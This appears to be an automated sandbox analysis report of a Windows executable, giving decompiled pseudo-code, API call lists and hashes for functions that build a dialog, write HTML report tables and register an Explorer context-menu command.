                                                                                                  				E00402BEE(_t113);
                                                                                                  				return _t88;
                                                                                                  			}
















                                                                                                  0x00403c09
                                                                                                  0x00403c0c
                                                                                                  0x00403c11
                                                                                                  0x00403c1b
                                                                                                  0x00403c3f
                                                                                                  0x00403c4a
                                                                                                  0x00403c6e
                                                                                                  0x00403c96
                                                                                                  0x00403c9a
                                                                                                  0x00403ca6
                                                                                                  0x00403cb3
                                                                                                  0x00403cb8
                                                                                                  0x00403cc5
                                                                                                  0x00403cca
                                                                                                  0x00403cdd
                                                                                                  0x00403ce6
                                                                                                  0x00403cf8
                                                                                                  0x00403d11
                                                                                                  0x00403d26
                                                                                                  0x00403d3f
                                                                                                  0x00403d54
                                                                                                  0x00403d6d
                                                                                                  0x00403d76
                                                                                                  0x00403d88
                                                                                                  0x00403d9e
                                                                                                  0x00403db0
                                                                                                  0x00403db5
                                                                                                  0x00403dc4
                                                                                                  0x00403dc8
                                                                                                  0x00403dc9
                                                                                                  0x00403dca
                                                                                                  0x00403dda
                                                                                                  0x00403ddf
                                                                                                  0x00403de2
                                                                                                  0x00403de3
                                                                                                  0x00403df4
                                                                                                  0x00403df8
                                                                                                  0x00403df9
                                                                                                  0x00403dfa
                                                                                                  0x00403e0a
                                                                                                  0x00403e0f
                                                                                                  0x00403e12
                                                                                                  0x00403e13
                                                                                                  0x00403e22
                                                                                                  0x00403e26
                                                                                                  0x00403e28
                                                                                                  0x00403e29
                                                                                                  0x00403e39
                                                                                                  0x00403e3e
                                                                                                  0x00403e41
                                                                                                  0x00403e42
                                                                                                  0x00403e51
                                                                                                  0x00403e55
                                                                                                  0x00403e57
                                                                                                  0x00403e58
                                                                                                  0x00403e68
                                                                                                  0x00403e6d
                                                                                                  0x00403e70
                                                                                                  0x00403e71
                                                                                                  0x00403e71
                                                                                                  0x00403e87
                                                                                                  0x00403e8d
                                                                                                  0x00403e9e
                                                                                                  0x00403ea6
                                                                                                  0x00403eaf
                                                                                                  0x00403ebc

                                                                                                  APIs
                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                                                  • SetWindowLongW.USER32 ref: 00403C39
                                                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1038210931-0
                                                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 56%
                                                                                                  			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				intOrPtr _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				signed int _v24;
                                                                                                  				signed int _v28;
                                                                                                  				signed int _v32;
                                                                                                  				void _v138;
                                                                                                  				long _v140;
                                                                                                  				void _v242;
                                                                                                  				char _v244;
                                                                                                  				void _v346;
                                                                                                  				char _v348;
                                                                                                  				void _v452;
                                                                                                  				void _v962;
                                                                                                  				signed short _v964;
                                                                                                  				void* __esi;
                                                                                                  				void* _t87;
                                                                                                  				wchar_t* _t109;
                                                                                                  				intOrPtr* _t124;
                                                                                                  				signed int _t125;
                                                                                                  				signed int _t140;
                                                                                                  				signed int _t153;
                                                                                                  				intOrPtr* _t154;
                                                                                                  				signed int _t156;
                                                                                                  				signed int _t157;
                                                                                                  				void* _t159;
                                                                                                  				void* _t161;
                                                                                                  
                                                                                                  				_t124 = __ebx;
                                                                                                  				_v964 = _v964 & 0x00000000;
                                                                                                  				memset( &_v962, 0, 0x1fc);
                                                                                                  				_t125 = 0x18;
                                                                                                  				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
                                                                                                  				asm("movsw");
                                                                                                  				_t153 = 0;
                                                                                                  				_v244 = 0;
                                                                                                  				memset( &_v242, 0, 0x62);
                                                                                                  				_v348 = 0;
                                                                                                  				memset( &_v346, 0, 0x62);
                                                                                                  				_v140 = 0;
                                                                                                  				memset( &_v138, 0, 0x62);
                                                                                                  				_t161 = _t159 + 0x3c;
                                                                                                  				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
                                                                                                  				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
                                                                                                  				if(_t87 != 0xffffffff) {
                                                                                                  					_push(E0040ADC0(_t87,  &_v964));
                                                                                                  					_push(L" bgcolor=\"%s\"");
                                                                                                  					_push(0x32);
                                                                                                  					_push( &_v244);
                                                                                                  					L0040B1EC();
                                                                                                  					_t161 = _t161 + 0x18;
                                                                                                  				}
                                                                                                  				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
                                                                                                  				_v8 = _t153;
                                                                                                  				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
                                                                                                  					while(1) {
                                                                                                  						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
                                                                                                  						_v12 = _t156;
                                                                                                  						_t157 = _t156 * 0x14;
                                                                                                  						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
                                                                                                  							wcscpy( &_v140, L" nowrap");
                                                                                                  						}
                                                                                                  						_v32 = _v32 | 0xffffffff;
                                                                                                  						_v28 = _v28 | 0xffffffff;
                                                                                                  						_v24 = _v24 | 0xffffffff;
                                                                                                  						_v20 = _t153;
                                                                                                  						_t154 = _a8;
                                                                                                  						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
                                                                                                  						E0040ADC0(_v32,  &_v348);
                                                                                                  						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
                                                                                                  						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
                                                                                                  						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
                                                                                                  							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
                                                                                                  						} else {
                                                                                                  							_push( *(_t157 + _v16 + 0x10));
                                                                                                  							_push(E0040ADC0(_t106,  &_v964));
                                                                                                  							_push(L"<font color=\"%s\">%s</font>");
                                                                                                  							_push(0x2000);
                                                                                                  							_push( *(_t124 + 0x68));
                                                                                                  							L0040B1EC();
                                                                                                  							_t161 = _t161 + 0x14;
                                                                                                  						}
                                                                                                  						_t109 =  *(_t124 + 0x64);
                                                                                                  						_t140 =  *_t109 & 0x0000ffff;
                                                                                                  						if(_t140 == 0 || _t140 == 0x20) {
                                                                                                  							wcscat(_t109, L"&nbsp;");
                                                                                                  						}
                                                                                                  						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
                                                                                                  						_push( *((intOrPtr*)(_t124 + 0x6c)));
                                                                                                  						_push( &_v140);
                                                                                                  						_push( &_v348);
                                                                                                  						_push( *(_t124 + 0x68));
                                                                                                  						_push( &_v244);
                                                                                                  						_push( &_v452);
                                                                                                  						_push(0x2000);
                                                                                                  						_push( *((intOrPtr*)(_t124 + 0x60)));
                                                                                                  						L0040B1EC();
                                                                                                  						_t161 = _t161 + 0x28;
                                                                                                  						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
                                                                                                  						_v8 = _v8 + 1;
                                                                                                  						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
                                                                                                  							goto L14;
                                                                                                  						}
                                                                                                  						_t153 = 0;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				L14:
                                                                                                  				E00407343(_t124, _a4, L"</table><p>");
                                                                                                  				return E00407343(_t124, _a4, L"\r\n");
                                                                                                  			}































                                                                                                  0x00407763
                                                                                                  0x0040776c
                                                                                                  0x00407784
                                                                                                  0x0040778b
                                                                                                  0x00407797
                                                                                                  0x00407799
                                                                                                  0x0040779b
                                                                                                  0x004077a7
                                                                                                  0x004077ae
                                                                                                  0x004077bd
                                                                                                  0x004077c4
                                                                                                  0x004077d3
                                                                                                  0x004077da
                                                                                                  0x004077e1
                                                                                                  0x004077e6
                                                                                                  0x004077f2
                                                                                                  0x004077f5
                                                                                                  0x00407804
                                                                                                  0x00407805
                                                                                                  0x00407810
                                                                                                  0x00407812
                                                                                                  0x00407813
                                                                                                  0x00407818
                                                                                                  0x00407818
                                                                                                  0x00407825
                                                                                                  0x0040782d
                                                                                                  0x00407830
                                                                                                  0x0040783a
                                                                                                  0x00407840
                                                                                                  0x00407846
                                                                                                  0x00407849
                                                                                                  0x00407850
                                                                                                  0x0040785e
                                                                                                  0x00407864
                                                                                                  0x00407867
                                                                                                  0x0040786b
                                                                                                  0x0040786f
                                                                                                  0x00407877
                                                                                                  0x0040787a
                                                                                                  0x00407885
                                                                                                  0x00407892
                                                                                                  0x004078a8
                                                                                                  0x004078b8
                                                                                                  0x004078c5
                                                                                                  0x004078ff
                                                                                                  0x004078c7
                                                                                                  0x004078ca
                                                                                                  0x004078dd
                                                                                                  0x004078de
                                                                                                  0x004078e3
                                                                                                  0x004078e8
                                                                                                  0x004078eb
                                                                                                  0x004078f0
                                                                                                  0x004078f0
                                                                                                  0x00407906
                                                                                                  0x00407909
                                                                                                  0x0040790f
                                                                                                  0x0040791d
                                                                                                  0x00407923
                                                                                                  0x0040792d
                                                                                                  0x00407932
                                                                                                  0x0040793b
                                                                                                  0x00407942
                                                                                                  0x00407943
                                                                                                  0x0040794c
                                                                                                  0x00407953
                                                                                                  0x00407954
                                                                                                  0x00407959
                                                                                                  0x0040795c
                                                                                                  0x00407961
                                                                                                  0x0040796c
                                                                                                  0x00407971
                                                                                                  0x0040797a
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00407838
                                                                                                  0x00407838
                                                                                                  0x0040783a
                                                                                                  0x00407980
                                                                                                  0x0040798a
                                                                                                  0x004079a1

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                  • API String ID: 1607361635-601624466
                                                                                                  • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                  • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                  • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                  • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 40%
                                                                                                  			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
                                                                                                  				void _v514;
                                                                                                  				char _v516;
                                                                                                  				void _v1026;
                                                                                                  				long _v1028;
                                                                                                  				void _v1538;
                                                                                                  				char _v1540;
                                                                                                  				void _v2050;
                                                                                                  				char _v2052;
                                                                                                  				char _v2564;
                                                                                                  				char _v35332;
                                                                                                  				char _t51;
                                                                                                  				intOrPtr* _t54;
                                                                                                  				void* _t61;
                                                                                                  				intOrPtr* _t73;
                                                                                                  				void* _t78;
                                                                                                  				void* _t79;
                                                                                                  				void* _t80;
                                                                                                  				void* _t81;
                                                                                                  
                                                                                                  				E0040B550(0x8a00, __ecx);
                                                                                                  				_v2052 = 0;
                                                                                                  				memset( &_v2050, 0, 0x1fc);
                                                                                                  				_v1540 = 0;
                                                                                                  				memset( &_v1538, 0, 0x1fc);
                                                                                                  				_v1028 = 0;
                                                                                                  				memset( &_v1026, 0, 0x1fc);
                                                                                                  				_t79 = _t78 + 0x24;
                                                                                                  				if(_a20 != 0xffffffff) {
                                                                                                  					_push(E0040ADC0(_a20,  &_v2564));
                                                                                                  					_push(L" bgcolor=\"%s\"");
                                                                                                  					_push(0xff);
                                                                                                  					_push( &_v2052);
                                                                                                  					L0040B1EC();
                                                                                                  					_t79 = _t79 + 0x18;
                                                                                                  				}
                                                                                                  				if(_a24 != 0xffffffff) {
                                                                                                  					_push(E0040ADC0(_a24,  &_v2564));
                                                                                                  					_push(L"<font color=\"%s\">");
                                                                                                  					_push(0xff);
                                                                                                  					_push( &_v1540);
                                                                                                  					L0040B1EC();
                                                                                                  					wcscpy( &_v1028, L"</font>");
                                                                                                  					_t79 = _t79 + 0x20;
                                                                                                  				}
                                                                                                  				_push( &_v2052);
                                                                                                  				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
                                                                                                  				_push(0x3fff);
                                                                                                  				_push( &_v35332);
                                                                                                  				L0040B1EC();
                                                                                                  				_t80 = _t79 + 0x10;
                                                                                                  				E00407343(_a4, _a8,  &_v35332);
                                                                                                  				_t51 = _a16;
                                                                                                  				if(_t51 > 0) {
                                                                                                  					_t73 = _a12 + 4;
                                                                                                  					_a20 = _t51;
                                                                                                  					do {
                                                                                                  						_v516 = 0;
                                                                                                  						memset( &_v514, 0, 0x1fc);
                                                                                                  						_t54 =  *_t73;
                                                                                                  						_t81 = _t80 + 0xc;
                                                                                                  						if( *_t54 == 0) {
                                                                                                  							_v516 = 0;
                                                                                                  						} else {
                                                                                                  							_push(_t54);
                                                                                                  							_push(L" width=\"%s\"");
                                                                                                  							_push(0xff);
                                                                                                  							_push( &_v516);
                                                                                                  							L0040B1EC();
                                                                                                  							_t81 = _t81 + 0x10;
                                                                                                  						}
                                                                                                  						_push( &_v1028);
                                                                                                  						_push( *((intOrPtr*)(_t73 - 4)));
                                                                                                  						_push( &_v1540);
                                                                                                  						_push( &_v516);
                                                                                                  						_push(L"<th%s>%s%s%s\r\n");
                                                                                                  						_push(0x3fff);
                                                                                                  						_push( &_v35332);
                                                                                                  						L0040B1EC();
                                                                                                  						_t80 = _t81 + 0x1c;
                                                                                                  						_t61 = E00407343(_a4, _a8,  &_v35332);
                                                                                                  						_t73 = _t73 + 8;
                                                                                                  						_t36 =  &_a20;
                                                                                                  						 *_t36 = _a20 - 1;
                                                                                                  					} while ( *_t36 != 0);
                                                                                                  					return _t61;
                                                                                                  				}
                                                                                                  				return _t51;
                                                                                                  			}





















                                                                                                  0x00407b65
                                                                                                  0x00407b7c
                                                                                                  0x00407b83
                                                                                                  0x00407b91
                                                                                                  0x00407b98
                                                                                                  0x00407ba6
                                                                                                  0x00407bad
                                                                                                  0x00407bb2
                                                                                                  0x00407bb9
                                                                                                  0x00407bca
                                                                                                  0x00407bcb
                                                                                                  0x00407bd6
                                                                                                  0x00407bdb
                                                                                                  0x00407bdc
                                                                                                  0x00407be1
                                                                                                  0x00407be1
                                                                                                  0x00407be8
                                                                                                  0x00407bf9
                                                                                                  0x00407bfa
                                                                                                  0x00407c05
                                                                                                  0x00407c0a
                                                                                                  0x00407c0b
                                                                                                  0x00407c1c
                                                                                                  0x00407c21
                                                                                                  0x00407c21
                                                                                                  0x00407c2a
                                                                                                  0x00407c2b
                                                                                                  0x00407c36
                                                                                                  0x00407c3b
                                                                                                  0x00407c3c
                                                                                                  0x00407c41
                                                                                                  0x00407c51
                                                                                                  0x00407c56
                                                                                                  0x00407c5b
                                                                                                  0x00407c65
                                                                                                  0x00407c68
                                                                                                  0x00407c6b
                                                                                                  0x00407c74
                                                                                                  0x00407c7b
                                                                                                  0x00407c80
                                                                                                  0x00407c82
                                                                                                  0x00407c88
                                                                                                  0x00407ca6
                                                                                                  0x00407c8a
                                                                                                  0x00407c8a
                                                                                                  0x00407c8b
                                                                                                  0x00407c96
                                                                                                  0x00407c9b
                                                                                                  0x00407c9c
                                                                                                  0x00407ca1
                                                                                                  0x00407ca1
                                                                                                  0x00407cb3
                                                                                                  0x00407cb4
                                                                                                  0x00407cbd
                                                                                                  0x00407cc4
                                                                                                  0x00407cc5
                                                                                                  0x00407cd0
                                                                                                  0x00407cd5
                                                                                                  0x00407cd6
                                                                                                  0x00407cdb
                                                                                                  0x00407ceb
                                                                                                  0x00407cf0
                                                                                                  0x00407cf3
                                                                                                  0x00407cf3
                                                                                                  0x00407cf3
                                                                                                  0x00000000
                                                                                                  0x00407cfc
                                                                                                  0x00407d00

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                  • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                  • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                  • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                  • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 51%
                                                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
                                                                                                  				void* _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* _v24;
                                                                                                  				intOrPtr _v28;
                                                                                                  				short _v32;
                                                                                                  				void _v2078;
                                                                                                  				signed int _v2080;
                                                                                                  				void _v4126;
                                                                                                  				char _v4128;
                                                                                                  				void _v6174;
                                                                                                  				char _v6176;
                                                                                                  				void _v8222;
                                                                                                  				char _v8224;
                                                                                                  				signed int _t49;
                                                                                                  				short _t55;
                                                                                                  				intOrPtr _t56;
                                                                                                  				int _t73;
                                                                                                  				intOrPtr _t78;
                                                                                                  
                                                                                                  				_t76 = __ecx;
                                                                                                  				E0040B550(0x201c, __ecx);
                                                                                                  				_t73 = 0;
                                                                                                  				if(E004043F8( &_v8, 0x2001f) != 0) {
                                                                                                  					L6:
                                                                                                  					return _t73;
                                                                                                  				}
                                                                                                  				_v6176 = 0;
                                                                                                  				memset( &_v6174, 0, 0x7fe);
                                                                                                  				_t78 = _a4;
                                                                                                  				_push(_t78 + 0x20a);
                                                                                                  				_push(_t78);
                                                                                                  				_push(L"%s\\shell\\%s\\command");
                                                                                                  				_push(0x3ff);
                                                                                                  				_push( &_v6176);
                                                                                                  				L0040B1EC();
                                                                                                  				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
                                                                                                  					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
                                                                                                  					asm("sbb ebx, ebx");
                                                                                                  					_t73 =  ~_t49 + 1;
                                                                                                  					RegCloseKey(_v12);
                                                                                                  					_v2080 = _v2080 & 0x00000000;
                                                                                                  					memset( &_v2078, 0, 0x7fe);
                                                                                                  					E00404AD9( &_v2080);
                                                                                                  					if(_v2078 == 0x3a) {
                                                                                                  						_t55 =  *L"C:\\"; // 0x3a0043
                                                                                                  						_v32 = _t55;
                                                                                                  						_t56 =  *0x40ccdc; // 0x5c
                                                                                                  						_v28 = _t56;
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						asm("stosd");
                                                                                                  						_v32 = _v2080;
                                                                                                  						if(GetDriveTypeW( &_v32) == 3) {
                                                                                                  							_v4128 = 0;
                                                                                                  							memset( &_v4126, 0, 0x7fe);
                                                                                                  							_v8224 = 0;
                                                                                                  							memset( &_v8222, 0, 0x7fe);
                                                                                                  							_push(_a4 + 0x20a);
                                                                                                  							_push(_a4);
                                                                                                  							_push(L"%s\\shell\\%s");
                                                                                                  							_push(0x3ff);
                                                                                                  							_push( &_v8224);
                                                                                                  							L0040B1EC();
                                                                                                  							_push( &_v2080);
                                                                                                  							_push(L"\"%s\",0");
                                                                                                  							_push(0x3ff);
                                                                                                  							_push( &_v4128);
                                                                                                  							L0040B1EC();
                                                                                                  							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
                                                                                                  						}
                                                                                                  					}
                                                                                                  				}
                                                                                                  				RegCloseKey(_v8);
                                                                                                  				goto L6;
                                                                                                  			}





















                                                                                                  0x00404415
                                                                                                  0x0040441d
                                                                                                  0x0040442c
                                                                                                  0x00404435
                                                                                                  0x004045b3
                                                                                                  0x004045b7
                                                                                                  0x004045b7
                                                                                                  0x0040444b
                                                                                                  0x00404452
                                                                                                  0x00404457
                                                                                                  0x00404460
                                                                                                  0x00404461
                                                                                                  0x00404462
                                                                                                  0x0040446d
                                                                                                  0x00404472
                                                                                                  0x00404473
                                                                                                  0x00404490
                                                                                                  0x004044a5
                                                                                                  0x004044b4
                                                                                                  0x004044b6
                                                                                                  0x004044b7
                                                                                                  0x004044bd
                                                                                                  0x004044cf
                                                                                                  0x004044db
                                                                                                  0x004044eb
                                                                                                  0x004044f1
                                                                                                  0x004044f6
                                                                                                  0x004044f9
                                                                                                  0x004044fe
                                                                                                  0x00404506
                                                                                                  0x00404507
                                                                                                  0x00404508
                                                                                                  0x00404510
                                                                                                  0x00404521
                                                                                                  0x00404532
                                                                                                  0x00404539
                                                                                                  0x00404547
                                                                                                  0x0040454e
                                                                                                  0x0040455b
                                                                                                  0x0040455c
                                                                                                  0x00404564
                                                                                                  0x0040456f
                                                                                                  0x00404570
                                                                                                  0x00404571
                                                                                                  0x0040457c
                                                                                                  0x0040457d
                                                                                                  0x00404588
                                                                                                  0x00404589
                                                                                                  0x0040458a
                                                                                                  0x004045a0
                                                                                                  0x004045a5
                                                                                                  0x00404521
                                                                                                  0x004044eb
                                                                                                  0x004045ab
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00404452
                                                                                                  • _snwprintf.MSVCRT ref: 00404473
                                                                                                    • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                    • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                    • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                  • memset.MSVCRT ref: 004044CF
                                                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                  • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                  • memset.MSVCRT ref: 00404539
                                                                                                  • memset.MSVCRT ref: 0040454E
                                                                                                  • _snwprintf.MSVCRT ref: 00404571
                                                                                                  • _snwprintf.MSVCRT ref: 0040458A
                                                                                                    • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.279908586.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000004.00000002.279901099.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279921573.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279928879.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000004.00000002.279942305.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                  • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                  • API String ID: 486436031-734527199
                                                                                                  • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                  • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                  • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                  • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
